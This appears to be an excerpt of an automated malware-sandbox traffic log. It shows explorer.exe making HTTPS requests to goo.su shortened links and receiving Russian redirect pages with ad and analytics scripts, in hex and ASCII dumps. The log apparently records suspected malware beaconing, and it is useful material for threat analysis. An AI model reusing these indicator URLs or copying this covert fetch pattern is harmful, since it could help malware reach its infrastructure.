                                                                                                                                  2022-01-11 22:39:18 UTC6792INData Raw: 2d 32 37 2e 37 38 36 32 35 20 30 2d 31 30 2e 39 33 37 35 20 33 2e 34 39 36 32 35 2d 32 30 2e 31 20 31 30 2e 36 33 31 32 35 2d 32 37 2e 36 33 37 35 20 37 2e 31 33 35 2d 37 2e 35 33 37 35 20 31 35 2e 39 34 37 35 2d 31 31 2e 33 38 20 32 36 2e 32 39 38 37 35 2d 31 31 2e 33 38 20 31 30 2e 33 35 32 35 20 30 20 31 39 2e 31 36 35 20 33 2e 38 34 32 35 20 32 36 2e 33 20 31 31 2e 33 38 20 37 2e 31 33 35 20 37 2e 35 33 37 35 20 31 30 2e 37 37 31 32 35 20 31 36 2e 38 34 38 37 35 20 31 30 2e 37 37 31 32 35 20 32 37 2e 36 33 37 35 20 30 20 31 30 2e 39 33 37 35 2d 33 2e 36 33 36 32 35 20 32 30 2e 32 34 38 37 35 2d 31 30 2e 37 37 31 32 35 20 32 37 2e 37 38 36 32 35 2d 37 2e 31 33 35 20 37 2e 35 33 38 37 35 2d 31 35 2e 38 30 37 35 20 31 31 2e 32 33 32 35 2d 32 36 2e 33 20
                                                                                                                                  Data Ascii: -27.78625 0-10.9375 3.49625-20.1 10.63125-27.6375 7.135-7.5375 15.9475-11.38 26.29875-11.38 10.3525 0 19.165 3.8425 26.3 11.38 7.135 7.5375 10.77125 16.84875 10.77125 27.6375 0 10.9375-3.63625 20.24875-10.77125 27.78625-7.135 7.53875-15.8075 11.2325-26.3


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  2192.168.2.549868172.67.139.105443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-01-11 22:38:57 UTC526OUTGET /abhF HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Host: goo.su
                                                                                                                                  2022-01-11 22:38:57 UTC526INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:57 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  vary: Accept-Encoding
                                                                                                                                  x-powered-by: PHP/7.2.21
                                                                                                                                  cache-control: private, must-revalidate
                                                                                                                                  pragma: no-cache
                                                                                                                                  expires: -1
                                                                                                                                  set-cookie: XSRF-TOKEN=eyJpdiI6Inp6Vm0zRU5HZTNoaXZqbk9jazNFbVE9PSIsInZhbHVlIjoiRnB2RStsOFRcL3RzQWNKbWhpTWJiZnpCVGFMMjJQUXlyM2ZtSGpqcllqdTZ0OFwvTTQwTXB0Z0pHdnFCY1E5Vk1yIiwibWFjIjoiZjlkOWY4MmYxYzYyYzEyY2E4MTFiNTczYTIxMWEwY2EzZTAzZTg3MjdlY2ZlZjBlZDMxZmIwZmMwYzY0ZGQxYSJ9; expires=Wed, 12-Jan-2022 17:18:57 GMT; Max-Age=67200; path=/
                                                                                                                                  set-cookie: goosu_session=eyJpdiI6IkU0amVESVl3MUVWdE5JZlVMc0gxZFE9PSIsInZhbHVlIjoiQWFsR0NYbEFEYVVyUVdkZzN5elFrUVJlbHVpK3o3XC9CTDBaWUEwSWdMSnc1K3lpVUdBQmpIRWtxeFNTcUdIVWMiLCJtYWMiOiJlZGEyZWUwZDY5NTQ1NDhkYWI4NTNlZmIwMWI5MTc0Y2NjZWYxM2M4YTZiZTY1NzZiZjdhMTU4YWFjMDA5ZDIzIn0%3D; expires=Wed, 12-Jan-2022 17:18:57 GMT; Max-Age=67200; path=/; httponly
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zMPbQUXLgLsD9eHJ4BEuV986avq5XwZdkOfPCU1XtP6ushpNTUdOf0ey7rxmLh4XF%2BKDmv%2FsikcfxE7EvbKOajh5kIWnGV7g1dMExCti1l4L6iEjAzDO6ac%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  2022-01-11 22:38:57 UTC528INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 36 63 63 31 61 33 36 61 33 65 61 31 37 37 32 63 2d 4c 48 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 2c 20 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 2c 20 68 33 2d 32 38 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 2c 20 68 33 2d 32 37 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cc1a36a3ea1772c-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                  2022-01-11 22:38:57 UTC528INData Raw: 32 31 32 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0a 3c 74 69 74 6c 65 3e d0 9f d1 80 d0 be d0 b8 d1 81 d1 85 d0 be d0 b4 d0 b8 d1 82 20 d0 bf d0 b5 d1 80 d0 b5 d0 bd d0 b0 d0 bf d1 80 d0 b0 d0 b2 d0 bb d0 b5 d0 bd d0 b8 d0 b5 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 68
                                                                                                                                  Data Ascii: 212e<!doctype html><html lang="ru"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="robots" content="noindex"><title> ...</title><link h
                                                                                                                                  2022-01-11 22:38:57 UTC529INData Raw: 36 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2e 31 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 75 70 70 65 72 63 61 73 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6d 2d 62 2d 6d 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 62 6f 72 64 65 72 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: 600; letter-spacing: .1rem; text-decoration: none; text-transform: uppercase; } .m-b-md { margin-bottom: 30px; } .bordered { border: 1px solid #eee;
                                                                                                                                  2022-01-11 22:38:57 UTC530INData Raw: 74 65 78 74 2e 41 64 76 4d 61 6e 61 67 65 72 2e 72 65 6e 64 65 72 28 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6c 6f 63 6b 49 64 3a 20 22 52 2d 41 2d 34 31 33 39 38 30 2d 38 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 6e 64 65 72 54 6f 3a 20 22 79 61 6e 64 65 78 5f 72 74 62 5f 52 2d 41 2d 34 31 33 39 38 30 2d 38 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 73 79 6e 63 3a 20 74 72 75 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: text.AdvManager.render({ blockId: "R-A-413980-8", renderTo: "yandex_rtb_R-A-413980-8", async: true }); });
                                                                                                                                  2022-01-11 22:38:57 UTC532INData Raw: 6f 3a 20 22 79 61 6e 64 65 78 5f 72 74 62 5f 52 2d 41 2d 34 31 33 39 38 30 2d 31 34 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 73 79 6e 63 3a 20 74 72 75 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 20 3d 20 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 20 3d 20 64 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: o: "yandex_rtb_R-A-413980-14", async: true }); }); t = d.getElementsByTagName("script")[0]; s = d.createElement("script");
                                                                                                                                  2022-01-11 22:38:57 UTC533INData Raw: 73 2c 20 74 68 69 73 2e 64 6f 63 75 6d 65 6e 74 2c 20 22 79 61 6e 64 65 78 43 6f 6e 74 65 78 74 41 73 79 6e 63 43 61 6c 6c 62 61 63 6b 73 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 73 6c 69 6d 2e 6d 69 6e 2e 6a 73 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 33 38 34 2d 71 38 69 2f 58 2b 39 36 35 44 7a 4f 30 72 54 37 61 62 4b 34 31 4a 53 74 51 49 41 71 56 67 52 56 7a 70 62 7a 6f 35 73 6d 58 4b 70 34 59 66 52 76 48 2b 38 61 62 74 54 45 31 50 69 36 6a 69 7a 6f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61
                                                                                                                                  Data Ascii: s, this.document, "yandexContextAsyncCallbacks"); </script></div></div></body><script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="a
                                                                                                                                  2022-01-11 22:38:57 UTC534INData Raw: 72 64 65 72 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 2d 39 39 39 39 70 78 3b 22 20 61 6c 74 3d 22 54 6f 70 2e 4d 61 69 6c 2e 52 75 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 6c 69 76 65 69 6e 74 65 72 6e 65 74 2e 72 75 2f 63 6c 69 63 6b 22 20 27 2b 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 74 34 34 2e 31 31 3b 72
                                                                                                                                  Data Ascii: rder:0;position:absolute;left:-9999px;" alt="Top.Mail.Ru" /> </div></noscript><script type="text/javascript"> document.write('<a href="//www.liveinternet.ru/click" '+ 'target="_blank"><img src="//counter.yadro.ru/hit?t44.11;r
                                                                                                                                  2022-01-11 22:38:57 UTC536INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 28 64 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 20 3d 3d 20 22 68 74 74 70 73 3a 22 20 3f 20 22 68 74 74 70 73 3a 22 20 3a 20 22 68 74 74 70 3a 22 29 20 2b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 2f 2f 73 74 2e 74 6f 70 31 30 30 2e 72 75 2f 74 6f 70 31 30 30 2f 74 6f 70 31 30 30 2e 6a 73 22 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 77 2e 6f 70 65 72 61 20 3d 3d 20 22 5b 6f 62 6a 65 63 74 20 4f 70 65 72 61 5d 22 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 20 66 2c 20 66 61 6c 73 65 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65
                                                                                                                                  Data Ascii: (d.location.protocol == "https:" ? "https:" : "http:") + "//st.top100.ru/top100/top100.js"; if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else
                                                                                                                                  2022-01-11 22:38:57 UTC536INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  3192.168.2.549871172.67.139.105443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-01-11 22:38:58 UTC536OUTGET /XvD HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Host: goo.su
                                                                                                                                  2022-01-11 22:38:58 UTC536INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:58 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  vary: Accept-Encoding
                                                                                                                                  x-powered-by: PHP/7.2.21
                                                                                                                                  cache-control: private, must-revalidate
                                                                                                                                  pragma: no-cache
                                                                                                                                  expires: -1
                                                                                                                                  set-cookie: XSRF-TOKEN=eyJpdiI6InphN1NQWjdxNmN5QTRrSmg1Y3Fpd3c9PSIsInZhbHVlIjoiUHJlTVc1M1JEbCtkZUJvZ0lORHViaDNNdHlSMW5GWXNDT1hxK3dWUlMxYWZtNU9GR3pmOFRhTHl3UTdrTEhvZiIsIm1hYyI6ImMwOWI2OTlhYjEyNjcwMmI2MDhiMmIxMjQyNjA2MzFmYjAxMjAyNWNiMTNiZDMxOTMxNzYyNDMyOTE2ZDc5M2IifQ%3D%3D; expires=Wed, 12-Jan-2022 17:18:58 GMT; Max-Age=67200; path=/
                                                                                                                                  set-cookie: goosu_session=eyJpdiI6IkNBZnhsVGNQdzRrczNNRlwva1pOTWJnPT0iLCJ2YWx1ZSI6InVzSWtuOVlOVlgrMTA4QVZFN3NLOU0yaDRPa1o0Uk95clBFZ2x6V3JWR2lQV3hSZ0RZMzlidWo1c2pTMEFhZEEiLCJtYWMiOiJjOTQzMDQwNWQ5ODdkMWMyZDI5YWY5YWQ2NTQ1MDJkY2NmOGQ1ZDMwNzc4NmNiNmEyMmJiZGVjYTJkYjRkYjFmIn0%3D; expires=Wed, 12-Jan-2022 17:18:58 GMT; Max-Age=67200; path=/; httponly
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FzWAtM6Q2Dl5GZ513bnrlbSH3B97w8Z64vJ2tc7nMvrsuxQQ9ZZIH8y6tvw%2Bvq2X6h56HvKyeOY%2F2SR16xO9ys%2BkGmqanPhIixeH6y9cvjIZnXgrLA3PkwY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  2022-01-11 22:38:58 UTC538INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 36 63 63 31 61 33 36 65 39 61 65 33 37 31 66 32 2d 4c 48 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 2c 20 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 2c 20 68 33 2d 32 38 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 2c 20 68 33 2d 32 37 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cc1a36e9ae371f2-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                  2022-01-11 22:38:58 UTC538INData Raw: 32 31 32 66 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0a 3c 74 69 74 6c 65 3e d0 9f d1 80 d0 be d0 b8 d1 81 d1 85 d0 be d0 b4 d0 b8 d1 82 20 d0 bf d0 b5 d1 80 d0 b5 d0 bd d0 b0 d0 bf d1 80 d0 b0 d0 b2 d0 bb d0 b5 d0 bd d0 b8 d0 b5 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 68
                                                                                                                                  Data Ascii: 212f<!doctype html><html lang="ru"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="robots" content="noindex"><title> ...</title><link h
                                                                                                                                  2022-01-11 22:38:58 UTC539INData Raw: 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2e 31 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 75 70 70 65 72 63 61 73 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6d 2d 62 2d 6d 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 62 6f 72 64 65 72 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0a 20 20 20 20
                                                                                                                                  Data Ascii: weight: 600; letter-spacing: .1rem; text-decoration: none; text-transform: uppercase; } .m-b-md { margin-bottom: 30px; } .bordered { border: 1px solid #eee;
                                                                                                                                  2022-01-11 22:38:58 UTC540INData Raw: 20 20 20 59 61 2e 43 6f 6e 74 65 78 74 2e 41 64 76 4d 61 6e 61 67 65 72 2e 72 65 6e 64 65 72 28 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6c 6f 63 6b 49 64 3a 20 22 52 2d 41 2d 34 31 33 39 38 30 2d 38 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 6e 64 65 72 54 6f 3a 20 22 79 61 6e 64 65 78 5f 72 74 62 5f 52 2d 41 2d 34 31 33 39 38 30 2d 38 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 73 79 6e 63 3a 20 74 72 75 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: Ya.Context.AdvManager.render({ blockId: "R-A-413980-8", renderTo: "yandex_rtb_R-A-413980-8", async: true }); });
                                                                                                                                  2022-01-11 22:38:58 UTC542INData Raw: 20 20 72 65 6e 64 65 72 54 6f 3a 20 22 79 61 6e 64 65 78 5f 72 74 62 5f 52 2d 41 2d 34 31 33 39 38 30 2d 31 34 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 73 79 6e 63 3a 20 74 72 75 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 20 3d 20 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 20 3d 20 64 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: renderTo: "yandex_rtb_R-A-413980-14", async: true }); }); t = d.getElementsByTagName("script")[0]; s = d.createElement("script");
                                                                                                                                  2022-01-11 22:38:58 UTC543INData Raw: 20 20 20 7d 29 28 74 68 69 73 2c 20 74 68 69 73 2e 64 6f 63 75 6d 65 6e 74 2c 20 22 79 61 6e 64 65 78 43 6f 6e 74 65 78 74 41 73 79 6e 63 43 61 6c 6c 62 61 63 6b 73 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 73 6c 69 6d 2e 6d 69 6e 2e 6a 73 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 33 38 34 2d 71 38 69 2f 58 2b 39 36 35 44 7a 4f 30 72 54 37 61 62 4b 34 31 4a 53 74 51 49 41 71 56 67 52 56 7a 70 62 7a 6f 35 73 6d 58 4b 70 34 59 66 52 76 48 2b 38 61 62 74 54 45 31 50 69 36 6a 69 7a 6f 22 20 63 72 6f 73 73
                                                                                                                                  Data Ascii: })(this, this.document, "yandexContextAsyncCallbacks"); </script></div></div></body><script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" cross
                                                                                                                                  2022-01-11 22:38:58 UTC544INData Raw: 73 74 79 6c 65 3d 22 62 6f 72 64 65 72 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 2d 39 39 39 39 70 78 3b 22 20 61 6c 74 3d 22 54 6f 70 2e 4d 61 69 6c 2e 52 75 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 6c 69 76 65 69 6e 74 65 72 6e 65 74 2e 72 75 2f 63 6c 69 63 6b 22 20 27 2b 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74
                                                                                                                                  Data Ascii: style="border:0;position:absolute;left:-9999px;" alt="Top.Mail.Ru" /> </div></noscript><script type="text/javascript"> document.write('<a href="//www.liveinternet.ru/click" '+ 'target="_blank"><img src="//counter.yadro.ru/hit
                                                                                                                                  2022-01-11 22:38:58 UTC546INData Raw: 73 2e 73 72 63 20 3d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 28 64 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 20 3d 3d 20 22 68 74 74 70 73 3a 22 20 3f 20 22 68 74 74 70 73 3a 22 20 3a 20 22 68 74 74 70 3a 22 29 20 2b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 2f 2f 73 74 2e 74 6f 70 31 30 30 2e 72 75 2f 74 6f 70 31 30 30 2f 74 6f 70 31 30 30 2e 6a 73 22 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 77 2e 6f 70 65 72 61 20 3d 3d 20 22 5b 6f 62 6a 65 63 74 20 4f 70 65 72 61 5d 22 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 20 66 2c 20 66 61 6c 73 65 29 3b 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//st.top100.ru/top100/top100.js"; if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false);
